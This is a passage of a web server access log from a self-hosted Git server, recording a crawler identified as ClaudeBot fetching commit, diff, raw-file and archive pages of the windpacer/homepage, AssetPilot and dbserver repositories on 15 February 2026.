200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.Notebook%2FBRIN%2520%25EC%2584%25A4%25EB%25AA%2585.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 22215] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 15643] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 216.73.216.188] [Length 13367] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 388213] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 216.73.216.188] [Length 13160] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 388223] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 387825] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 387812] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 9955] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 36007] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 10993] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 35998] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 216.73.216.188] [Length 15977] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 57832] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 57833] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 216.73.216.188] [Length 15730] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 10989] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 15617] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 10987] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fmail_contact.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.tar.gz" [Client 216.73.216.188] [Length 25538438] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.tar.gz" [Client 216.73.216.188] [Length 25538853] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11531] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 441714] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11225] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fmilestones" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 10970] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11548] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 156421] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 36017] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 156442] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py" [Client 216.73.216.188] [Length 23744] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fquarterly" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 216.73.216.188] [Length 10981] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fmail_contact.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 190234] [Gzip 12.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 22947] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 